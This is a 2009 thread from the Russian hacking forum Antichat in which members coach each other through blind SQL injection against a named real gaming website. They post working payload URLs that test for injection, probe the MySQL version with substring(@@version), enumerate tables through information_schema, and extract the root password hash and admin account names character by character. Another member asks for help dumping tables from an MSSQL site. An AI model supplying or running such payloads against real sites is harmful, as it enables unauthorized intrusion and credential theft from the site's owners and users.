Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

11.01.2009, 13:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
R1dex красавчег, а я в исхолники не посмотрел. +5
|
|
|

11.01.2009, 15:13
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Еще вопросег =)
http://www.check6gaming.com/news.php?id=67+GROUP+BY+100+--
пробовл все, вплоть до 0 - сначала ишед Unknown column, а когда подставляю 1 или 0 - Can't group on 'count(*)'
Что я делаю не так?
|
|
|

11.01.2009, 15:40
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Сообщение от wildshaman
Еще вопросег =)
http://www.check6gaming.com/news.php?id=67+GROUP+BY+100+--
пробовл все, вплоть до 0 - сначала ишед Unknown column, а когда подставляю 1 или 0 - Can't group on 'count(*)'
Что я делаю не так?
вот что смог определить
Код:
http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
5 версия мускула
|
|
|

11.01.2009, 15:44
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Сообщение от z00MAN
вот что смог определить
Код:
http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
5 версия мускула
Гм, интеренсо...
А продробней не расскажешь, как определял - какие промежуточные действия были до hand+substring(@@version,1,1)=5
|
|
|

11.01.2009, 15:49
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме: 2337678
Репутация:
354
|
|
wildshaman
Использовал подзапросы, посимвольный перебор
читай _www.abc-it.lv/index.php/id/715
промежуточные действия
substring(@@version,1,1)=3
substring(@@version,1,1)=4
substring(@@version,1,1)=5
5 возвращает true. Значит версия пятая.
Так же можешь перебрать user,database и т.д.
|
|
|

11.01.2009, 15:54
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Сообщение от wildshaman
Гм, интеренсо...
А продробней не расскажешь, как определял - какие промежуточные действия были до hand+substring(@@version,1,1)=5
вот имеется наш урл:
Код:
http://www.check6gaming.com/news.php?id=67
для теста на inj проверяем
Код:
http://www.check6gaming.com/news.php?id=67+and+1=1
выводится тот же запрос,что и при id=67
определяем версию:
substring(@@version,1,1)=4
первый символ сравниваем с 4, если 4 версия то отобразиться такая же странцица как и при id=67
наконец запрос
Код:
http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
не выдает ошибки, соответственно версия мускула = 5
Последний раз редактировалось z00MAN; 11.01.2009 в 15:56..
|
|
|

11.01.2009, 16:00
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Сообщение от z00MAN
вот имеется наш урл:
Код:
http://www.check6gaming.com/news.php?id=67
для теста на inj проверяем
Код:
http://www.check6gaming.com/news.php?id=67+and+1=1
выводится тот же запрос,что и при id=67
определяем версию:
substring(@@version,1,1)=4
первый символ сравниваем с 4, если 4 версия то отобразиться такая же странцица как и при id=67
наконец запрос
Код:
http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
не выдает ошибки, соответственно версия мускула = 5
Хех, спасибо =)
Как бы еще количество столбцов...
|
|
|

11.01.2009, 16:11
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Сообщение от wildshaman
Хех, спасибо =)
Как бы еще количество столбцов...
Если слепую крутить, то и кол-во столбцов не нужно.
Код:
http://www.check6gaming.com/news.php?id=67+and+substring((select+table_name+from+information_schema.tables+limit+17,1),1,18)='fp_accomplishments'
|
|
|

11.01.2009, 16:17
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме: 8148
Репутация:
13
|
|
хай
Есть скуль на сайте
база MSSQL
ввожу
index.cfm?page=search&searchstring=111-222-1933email@address.tst&searchtype=@@version или (select+system_user)
все нормально выводит
но как только пытаюсь вывести имена таблиц, страница просто перезагружается, не каких ошибок и прочего
В чем трабла? как вывести имена таблиц и колонок?
|
|
|

11.01.2009, 16:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
2 wildshaman:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((SELECT+p assword+from+mysql.user+WHERE+user='root'),1,1)))
А таблицы можешь так подбирать:
http://www.check6gaming.com/admin.php?name=67+AND+ascii(lower(substring(CONCAT _WS(0x3a,(select+name+from+admin+LIMIT+0,1),(selec t+name+from+admin+LIMIT+1,1),(select+name+from+adm in+LIMIT+2,1)),1,1)))=97
Последний раз редактировалось Pashkela; 11.01.2009 в 16:39..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|